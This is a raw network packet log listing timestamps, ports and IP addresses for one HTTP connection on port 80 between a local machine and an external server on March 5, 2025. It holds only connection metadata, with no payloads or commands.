Mar 5, 2025 10:52:08.322462082 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.322495937 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.322525978 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.322561979 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.322602987 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.322603941 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.322603941 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.361452103 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.361514091 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.361563921 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.361608028 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.361655951 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.361690998 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.361748934 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.361797094 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.361813068 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.361875057 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.361936092 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362000942 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362015963 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362056017 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362087965 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362112999 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362128973 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362152100 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362159967 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362174034 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362190008 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362205029 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362221003 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362243891 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362260103 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362283945 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362301111 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362313032 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362329960 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362343073 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362353086 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362375975 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362385988 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362394094 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362405062 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362415075 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362426996 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362441063 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362451077 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362457991 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362473011 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362483025 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362490892 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362499952 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362512112 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362521887 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362530947 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362544060 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362548113 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362560034 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362571001 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362581015 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362587929 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362607956 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362616062 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362627029 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362636089 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362648964 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362653971 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362663031 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362673044 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362680912 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362692118 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362699032 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362711906 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362721920 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362746000 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362756014 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362763882 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362781048 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362792015 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362801075 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362819910 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362827063 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362834930 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362848043 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362853050 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362864971 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362874031 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362884998 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362895966 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362904072 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362912893 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362924099 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362931967 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362941980 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362952948 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362967968 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362976074 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362976074 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.362987995 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.362998962 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363009930 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363020897 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363029957 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.363039970 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363046885 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.363055944 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363068104 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363075018 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.363085032 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363095999 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363109112 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363116980 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.363126993 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363137007 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.363146067 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.363153934 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368415117 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368452072 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368474007 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368508101 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368554115 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368586063 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368621111 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368666887 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368681908 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368716955 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368732929 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368757963 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368771076 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368786097 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368807077 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368814945 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368830919 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368840933 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368846893 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368856907 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368870974 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368875980 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368882895 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368894100 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368902922 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368923903 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368937016 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368952036 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368959904 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368968964 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368978024 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.368985891 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.368997097 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369007111 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.369013071 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369021893 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369029045 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.369036913 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369052887 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.369060993 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369076014 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369091034 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369106054 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.369111061 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369122028 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369129896 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.369138002 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369148016 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369155884 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.369163990 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369174957 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369183064 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.369191885 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.369215965 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.372380972 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.413855076 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.413887024 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.413942099 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.413985968 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.414000988 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.414036036 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.414060116 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.414096117 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.414129019 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.414151907 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.414186001 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.414228916 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.453236103 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453291893 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453351974 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453368902 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.453404903 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453461885 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.453489065 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453551054 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453603029 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.453635931 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453692913 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453747988 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.453772068 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453811884 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453862906 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.453895092 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.453952074 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454005957 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.454026937 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454099894 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454152107 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.454173088 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454205990 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454257011 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454273939 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.454328060 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454372883 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454433918 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.454488993 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454539061 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.454569101 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454598904 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454653978 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.454680920 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454735994 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454791069 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454807997 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.454864979 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454916000 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.454937935 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.454972029 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455008984 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455033064 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455086946 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455137014 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455157995 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455197096 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455245018 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455267906 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455303907 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455342054 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455367088 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455399990 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455432892 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455456018 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455487967 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455521107 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455547094 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455585003 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455621958 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455645084 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455704927 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455749035 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455764055 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455797911 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455842972 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455857992 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455890894 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455923080 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.455943108 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.455976009 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456007957 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456031084 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456063986 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456096888 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456120968 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456152916 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456186056 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456207037 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456238985 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456271887 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456327915 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456361055 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456407070 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456423044 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456455946 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456487894 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456510067 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456542969 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456576109 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456597090 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456629038 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456667900 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456690073 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456721067 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456754923 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456773996 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456805944 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456840992 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456866026 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456898928 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456932068 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.456959009 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.456990957 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457026005 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457047939 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457079887 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457122087 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457137108 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457169056 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457211971 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457226038 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457257032 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457290888 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457314014 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457345963 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457389116 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457403898 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457437038 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457470894 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457492113 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457525015 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457566977 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457581997 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457613945 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457647085 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457669973 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457701921 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457743883 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457758904 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457791090 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457825899 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457848072 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457880974 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457916021 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.457937956 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.457971096 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458014965 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458028078 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.458060026 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458092928 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458116055 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.458148956 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458342075 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458394051 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458427906 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458461046 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458502054 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458537102 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.458563089 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458595991 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.458616018 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.464735031 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.492481947 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.492527962 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.492573023 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.492633104 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.492669106 CET	80	49730	45.144.214.104	192.168.2.4
